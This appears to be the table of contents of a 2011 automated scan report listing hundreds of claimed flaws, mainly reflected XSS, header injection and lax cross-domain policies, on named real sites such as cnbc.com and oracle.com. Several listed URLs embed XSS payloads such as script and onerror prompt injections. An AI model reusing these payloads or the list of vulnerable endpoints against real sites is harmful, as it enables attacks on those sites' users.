XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09062011-02

Report generated by XSS.CX at Tue Sep 06 16:07:58 GMT-06:00 2011.


1. Cross-site scripting (stored)

2. HTTP header injection

2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]

2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]

2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]

2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter]

2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]

2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]

2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter]

2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

3.4. http://ads.rnmd.net/getAds [adDiv parameter]

3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

3.6. http://api-public.addthis.com/url/shares.json [callback parameter]

3.7. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.8. http://api.bizographics.com/v1/profile.json [callback parameter]

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]

3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]

3.14. http://api.viglink.com/api/ping [jsonp parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]

3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]

3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.26. http://cdn.krxd.net/config/ [site parameter]

3.27. http://content.plymedia.com/initialize [video parameter]

3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]

3.30. http://digg.com/submit [REST URL parameter 1]

3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]

3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]

3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]

3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]

3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

3.41. http://js.revsci.net/gateway/gw.js [csid parameter]

3.42. https://login.cnbc.com/cas/login [apphome parameter]

3.43. https://login.cnbc.com/cas/login [jsessionid parameter]

3.44. https://login.cnbc.com/cas/login [login_view parameter]

3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

3.47. https://login.cnbc.com/cas/login [service parameter]

3.48. https://login.cnbc.com/cas/login [source parameter]

3.49. https://login.cnbc.com/cas/login [source_type parameter]

3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]

3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1]

3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]

3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]

3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]

3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

3.59. http://ping.crowdscience.com/ping.js [m parameter]

3.60. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.61. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]

3.65. http://search.cnbc.com/main.do [keywords parameter]

3.66. http://search.cnbc.com/main.do [keywords parameter]

3.67. http://search.cnbc.com/main.do [keywords parameter]

3.68. http://search.cnbc.com/main.do [keywords parameter]

3.69. http://search.cnbc.com/main.do [pubfreq parameter]

3.70. http://search.cnbc.com/main.do [pubfreq parameter]

3.71. http://search.cnbc.com/main.do [sort parameter]

3.72. http://search.cnbc.com/main.do [sort parameter]

3.73. http://serve.directdigitalllc.com/serve.php [click parameter]

3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]

3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter]

3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]

3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]

3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]

3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]

3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]

3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

3.90. http://www.linkedin.com/countserv/count/share [url parameter]

3.91. http://www.sapient.com/en-us/search.html [search parameter]

3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]

3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]

3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]

3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

4. Flash cross-domain policy

4.1. http://a.tribalfusion.com/crossdomain.xml

4.2. http://a1.interclick.com/crossdomain.xml

4.3. http://action.mathtag.com/crossdomain.xml

4.4. http://ad.doubleclick.net/crossdomain.xml

4.5. http://admin.brightcove.com/crossdomain.xml

4.6. http://ads.pointroll.com/crossdomain.xml

4.7. http://ads.rnmd.net/crossdomain.xml

4.8. http://afe.specificclick.net/crossdomain.xml

4.9. http://ajax.googleapis.com/crossdomain.xml

4.10. http://altfarm.mediaplex.com/crossdomain.xml

4.11. http://at.amgdgt.com/crossdomain.xml

4.12. http://b.scorecardresearch.com/crossdomain.xml

4.13. http://c.betrad.com/crossdomain.xml

4.14. http://c.brightcove.com/crossdomain.xml

4.15. http://cache.specificmedia.com/crossdomain.xml

4.16. http://cdn.gigya.com/crossdomain.xml

4.17. http://cdn5.tribalfusion.com/crossdomain.xml

4.18. http://clk.fetchback.com/crossdomain.xml

4.19. http://content.links.channelintelligence.com/crossdomain.xml

4.20. http://content.plymedia.com/crossdomain.xml

4.21. http://core.insightexpressai.com/crossdomain.xml

4.22. http://d.adroll.com/crossdomain.xml

4.23. http://d.ads.readwriteweb.com/crossdomain.xml

4.24. http://d1.openx.org/crossdomain.xml

4.25. http://d7.zedo.com/crossdomain.xml

4.26. http://fls.doubleclick.net/crossdomain.xml

4.27. http://goku.brightcove.com/crossdomain.xml

4.28. http://gscounters.gigya.com/crossdomain.xml

4.29. http://ib.adnxs.com/crossdomain.xml

4.30. http://img-cdn.mediaplex.com/crossdomain.xml

4.31. http://imp.fetchback.com/crossdomain.xml

4.32. http://intelligence.marykay.com/crossdomain.xml

4.33. http://js.revsci.net/crossdomain.xml

4.34. http://l.betrad.com/crossdomain.xml

4.35. http://load.tubemogul.com/crossdomain.xml

4.36. http://log30.doubleverify.com/crossdomain.xml

4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml

4.38. http://network.realmedia.com/crossdomain.xml

4.39. http://now.eloqua.com/crossdomain.xml

4.40. http://oimg.m.cnbc.com/crossdomain.xml

4.41. http://oimg.nbcuni.com/crossdomain.xml

4.42. http://omni.csc.com/crossdomain.xml

4.43. http://oracle.112.2o7.net/crossdomain.xml

4.44. http://oracleglobal.112.2o7.net/crossdomain.xml

4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml

4.46. http://p.brilig.com/crossdomain.xml

4.47. http://pg.links.channelintelligence.com/crossdomain.xml

4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml

4.49. http://ping.crowdscience.com/crossdomain.xml

4.50. http://pix04.revsci.net/crossdomain.xml

4.51. http://pixel.adsafeprotected.com/crossdomain.xml

4.52. http://pixel.everesttech.net/crossdomain.xml

4.53. http://pixel.fetchback.com/crossdomain.xml

4.54. http://pixel.mathtag.com/crossdomain.xml

4.55. http://pixel.quantserve.com/crossdomain.xml

4.56. http://pro.cnbc.com/crossdomain.xml

4.57. http://r.casalemedia.com/crossdomain.xml

4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml

4.59. http://receive.inplay.tubemogul.com/crossdomain.xml

4.60. http://reviews.gillettevenus.com/crossdomain.xml

4.61. http://s0.2mdn.net/crossdomain.xml

4.62. http://search.twitter.com/crossdomain.xml

4.63. http://secure-us.imrworldwide.com/crossdomain.xml

4.64. http://services.plymedia.com/crossdomain.xml

4.65. http://speed.pointroll.com/crossdomain.xml

4.66. http://static.plymedia.com/crossdomain.xml

4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml

4.68. http://stats.deloitte.com/crossdomain.xml

4.69. http://statse.webtrendslive.com/crossdomain.xml

4.70. http://tags.bluekai.com/crossdomain.xml

4.71. http://tf.nexac.com/crossdomain.xml

4.72. http://ttwbs.channelintelligence.com/crossdomain.xml

4.73. http://wingateweb.112.2o7.net/crossdomain.xml

4.74. http://ad.wsod.com/crossdomain.xml

4.75. http://adadvisor.net/crossdomain.xml

4.76. http://ads.adsonar.com/crossdomain.xml

4.77. http://ads1.msn.com/crossdomain.xml

4.78. http://adx.g.doubleclick.net/crossdomain.xml

4.79. http://assets1.csc.com/crossdomain.xml

4.80. http://blogs.oracle.com/crossdomain.xml

4.81. http://bstats.adbrite.com/crossdomain.xml

4.82. http://channelsun.sun.com/crossdomain.xml

4.83. https://cms.paypal.com/crossdomain.xml

4.84. http://cnbc.com/crossdomain.xml

4.85. http://cvs.shoplocal.com/crossdomain.xml

4.86. http://data.cnbc.com/crossdomain.xml

4.87. http://developers.facebook.com/crossdomain.xml

4.88. http://disqus.com/crossdomain.xml

4.89. http://edge.sapient.com/crossdomain.xml

4.90. http://event.on24.com/crossdomain.xml

4.91. https://event.on24.com/crossdomain.xml

4.92. http://executivevision.cnbc.com/crossdomain.xml

4.93. http://js.adsonar.com/crossdomain.xml

4.94. http://login.cnbc.com/crossdomain.xml

4.95. https://login.cnbc.com/crossdomain.xml

4.96. http://m.cnbc.com/crossdomain.xml

4.97. http://media.cnbc.com/crossdomain.xml

4.98. http://msnbcmedia.msn.com/crossdomain.xml

4.99. http://optimized-by.rubiconproject.com/crossdomain.xml

4.100. http://pagead2.googlesyndication.com/crossdomain.xml

4.101. http://pi.pardot.com/crossdomain.xml

4.102. http://quote.cnbc.com/crossdomain.xml

4.103. http://rd.rlcdn.com/crossdomain.xml

4.104. http://search.cnbc.com/crossdomain.xml

4.105. http://server.iad.liveperson.net/crossdomain.xml

4.106. http://snas.nbcuni.com/crossdomain.xml

4.107. https://support.oracle.com/crossdomain.xml

4.108. http://symlookup.cnbc.com/crossdomain.xml

4.109. http://videometa.cnbc.com/crossdomain.xml

4.110. http://w.sharethis.com/crossdomain.xml

4.111. http://wd.sharethis.com/crossdomain.xml

4.112. http://www.apture.com/crossdomain.xml

4.113. http://www.atg.com/crossdomain.xml

4.114. https://www.atg.com/crossdomain.xml

4.115. http://www.cnbc.com/crossdomain.xml

4.116. http://www.csc.com/crossdomain.xml

4.117. http://www.deloitte.com/crossdomain.xml

4.118. http://www.facebook.com/crossdomain.xml

4.119. http://www.fetchback.com/crossdomain.xml

4.120. http://www.marykay.com/crossdomain.xml

4.121. http://www.msnbc.msn.com/crossdomain.xml

4.122. http://www.oracle.com/crossdomain.xml

4.123. http://www.oracleimg.com/crossdomain.xml

4.124. http://www.sapient.com/crossdomain.xml

4.125. http://www.youtube.com/crossdomain.xml

4.126. http://www2.znode.com/crossdomain.xml

4.127. http://1215.ic-live.com/crossdomain.xml

4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml

4.129. http://api.twitter.com/crossdomain.xml

4.130. https://docs.google.com/crossdomain.xml

4.131. http://search.oracle.com/crossdomain.xml

4.132. http://sophelle.app5.hubspot.com/crossdomain.xml

4.133. http://sun.edgeboss.net/crossdomain.xml

4.134. http://twitter.com/crossdomain.xml

4.135. http://www.covergirl.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

5.3. http://ads1.msn.com/clientaccesspolicy.xml

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.5. http://intelligence.marykay.com/clientaccesspolicy.xml

5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml

5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml

5.8. http://omni.csc.com/clientaccesspolicy.xml

5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml

5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml

5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml

5.12. http://pixel.quantserve.com/clientaccesspolicy.xml

5.13. http://s0.2mdn.net/clientaccesspolicy.xml

5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.15. http://speed.pointroll.com/clientaccesspolicy.xml

5.16. http://stats.deloitte.com/clientaccesspolicy.xml

5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml

5.18. http://cnbc.com/clientaccesspolicy.xml

5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml

5.20. http://executivevision.cnbc.com/clientaccesspolicy.xml

5.21. http://media.cnbc.com/clientaccesspolicy.xml

5.22. http://msnbcmedia.msn.com/clientaccesspolicy.xml

5.23. http://www.cnbc.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://digg.com/submit

6.2. http://www.bigcommerce.com/freetrial.php

6.3. http://www.oraclecfo.com/Authentication/Login_w.html

6.4. http://www.oraclecfo.com/Main/Home/Home_w.html

6.5. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

6.6. http://www.shopify.com/login

7. SSL cookie without secure flag set

7.1. https://forums.oracle.com/forums/adfAuthentication

7.2. https://forums.oracle.com/forums/category.jspa

7.3. https://forums.oracle.com/forums/guestsettings!default.jspa

7.4. https://forums.oracle.com/forums/index.jspa

7.5. https://forums.oracle.com/forums/login!withRedirect.jspa

7.6. https://forums.oracle.com/forums/main.jspa

7.7. https://register.cnbc.com/forgotPassword.do

7.8. https://register.cnbc.com/memberCenter.do

7.9. https://register.cnbc.com/registerUser.do

7.10. https://login.cnbc.com/cas/logout

7.11. https://login.oracle.com/favicon.ico

7.12. https://login.oracle.com/mysso/signon.jsp

7.13. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

7.14. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

7.15. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

7.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

7.17. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

7.18. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

7.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

7.20. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

7.21. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

7.22. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

7.23. https://login.oracle.com/mysso/sso_loginui/loginStyling.css

7.24. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

7.25. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

7.26. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

7.27. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

7.28. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

7.29. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

7.30. https://login.oracle.com/mysso/sso_loginui/sso_check.js

7.31. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

7.32. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

7.33. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

7.34. https://login.oracle.com/oam/server/sso/auth_cred_submit

7.35. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

7.36. https://register.cnbc.com/

7.37. https://register.cnbc.com/RandomImage.jsp

7.38. https://register.cnbc.com/cas

7.39. https://register.cnbc.com/checkemail.do

7.40. https://register.cnbc.com/checkpassword.do

7.41. https://register.cnbc.com/checkscreenname.do

7.42. https://register.cnbc.com/checkzipcode.do

7.43. https://register.cnbc.com/createUser.do

7.44. https://register.cnbc.com/css/forgotPassword.css

7.45. https://register.cnbc.com/css/member_center_sytles.css

7.46. https://register.cnbc.com/css/newRegistration.css

7.47. https://register.cnbc.com/css/registration.css

7.48. https://register.cnbc.com/email/EmailSupport.jsp

7.49. https://register.cnbc.com/favicon.ico

7.50. https://register.cnbc.com/forgotPassword1.do

7.51. https://register.cnbc.com/forgotpassword1.jsp

7.52. https://register.cnbc.com/images/clickToContinue.gif

7.53. https://register.cnbc.com/images/loaderImage.gif

7.54. https://register.cnbc.com/images/memberCenterHeader.jpg

7.55. https://register.cnbc.com/images/submitPreferences.jpg

7.56. https://register.cnbc.com/images/tick.jpg

7.57. https://register.cnbc.com/images/tile_02.gif

7.58. https://register.cnbc.com/images/wrong.jpg

7.59. https://register.cnbc.com/js/membercenter.js

7.60. https://register.cnbc.com/js/prototype_ajax.js

7.61. https://register.cnbc.com/js/registrationBasic.js

7.62. https://register.cnbc.com/js/registrationUtils.js

7.63. https://register.cnbc.com/js/registrationValidations.js

7.64. https://register.cnbc.com/js/s_code.js

7.65. https://register.cnbc.com/js/validation.js

7.66. https://register.cnbc.com/quote-html-webservice/fvquote.htm

7.67. https://register.cnbc.com/quote-html-webservice/quote.htm

7.68. https://register.cnbc.com/refreshlogin.jsp

8. Session token in URL

8.1. http://blogs.oracle.com/roller-ui/cwpLogin.jsp

8.2. https://forums.oracle.com/forums/category.jspa

8.3. https://forums.oracle.com/forums/main.jspa

8.4. https://forums.oracle.com/forums/style/style.jsp

8.5. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

8.6. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

8.7. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

8.8. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

8.9. https://forums.oracle.com/forums/themes/english/resources/s_code.js

8.10. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

8.11. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

8.12. https://forums.oracle.com/forums/themes/english/resources/style.css

8.13. http://l.sharethis.com/pview

8.14. https://login.cnbc.com/cas/login

8.15. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

8.16. https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif

8.17. https://myprofile.oracle.com/EndUser/adf/images/siready.gif

8.18. https://myprofile.oracle.com/EndUser/adf/images/t.gif

8.19. https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js

8.20. https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css

8.21. https://myprofile.oracle.com/EndUser/images/fading-background.png

8.22. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

8.23. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

8.24. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

8.25. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

8.26. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

8.27. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

8.28. http://www.apture.com/js/apture.js

8.29. http://www.atg.com/

8.30. http://www.atg.com/en/solutions/

8.31. http://www.atg.com/service/main.jsp

8.32. http://www.atg.com/service/main.jsp

8.33. https://www.atg.com/en/customers/listing/

8.34. https://www.atg.com/en/password/request/

8.35. https://www.atg.com/en/register/

8.36. https://www.atg.com/service/main.jsp

8.37. http://www.facebook.com/extern/login_status.php

8.38. http://www.google.com/search

8.39. http://www.oracle.com/us/technologies/virtualization/index.html

8.40. http://www.oracle.com/webapps/dialogue/dlgpage.jsp

8.41. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

8.42. http://www.readwriteweb.com/404.html

9. SSL certificate

9.1. https://account.bigcommerce.com/

9.2. https://myshopify.com/

9.3. https://support.bigcommerce.com/

9.4. https://www.bigcommerce.com/

9.5. https://bugzilla.mozilla.org/

9.6. https://cms.paypal.com/

9.7. https://deloitte.zettaneer.com/

9.8. https://dne.oracle.com/

9.9. https://docs.google.com/

9.10. https://education.oracle.com/

9.11. https://event.on24.com/

9.12. https://forms.netsuite.com/

9.13. https://forums.oracle.com/

9.14. https://login.cnbc.com/

9.15. https://login.oracle.com/

9.16. https://myprofile.oracle.com/

9.17. https://oracleus.wingateweb.com/

9.18. https://register.cnbc.com/

9.19. https://shop.oracle.com/

9.20. https://support.oracle.com/

9.21. https://www.atg.com/

9.22. https://www.cvs.com/

10. Password field submitted using GET method

11. ASP.NET ViewState without MAC enabled

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://convctr.overture.com/images/cc/cc.gif

12.3. http://pg.links.origin.channelintelligence.com/pages/wl.asp

12.4. http://pixel.everesttech.net/1688/i

12.5. http://ttwbs.channelintelligence.com/

12.6. http://a.tribalfusion.com/displayAd.js

12.7. http://a.tribalfusion.com/i.cid

12.8. http://a.tribalfusion.com/j.ad

12.9. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

12.10. http://a.tribalfusion.com/z/i.cid

12.11. http://ads.pointroll.com/PortalServe/

12.12. http://api.bizographics.com/v1/profile.redirect

12.13. http://b.scorecardresearch.com/b

12.14. http://c.statcounter.com/t.php

12.15. http://clk.fetchback.com/serve/fb/click

12.16. http://clk.fetchback.com/serve/fb/engmnt

12.17. https://cms.paypal.com/us/cgi-bin/

12.18. http://developers.facebook.com/plugins/

12.19. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi

12.20. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

12.21. http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif

12.22. http://imp.fetchback.com/serve/fb/adtag.js

12.23. http://imp.fetchback.com/serve/fb/imp

12.24. https://login.cnbc.com/cas/logout

12.25. http://m1215.ic-live.com/522/

12.26. http://m1460.ic-live.com/586/

12.27. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

12.28. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

12.29. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

12.30. http://optimized-by.rubiconproject.com/a/dk.html

12.31. http://optimized-by.rubiconproject.com/a/dk.js

12.32. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

12.33. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

12.34. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

12.35. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

12.36. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

12.37. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

12.38. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

12.39. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

12.40. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

12.41. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

12.42. http://p.brilig.com/contact/bct

12.43. http://pi.pardot.com/analytics

12.44. http://ping.crowdscience.com/ping.js

12.45. http://pixel.fetchback.com/serve/fb/pdc

12.46. http://pixel.quantserve.com/pixel

12.47. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif

12.48. http://r.openx.net/img

12.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.51. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.52. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.53. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.54. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

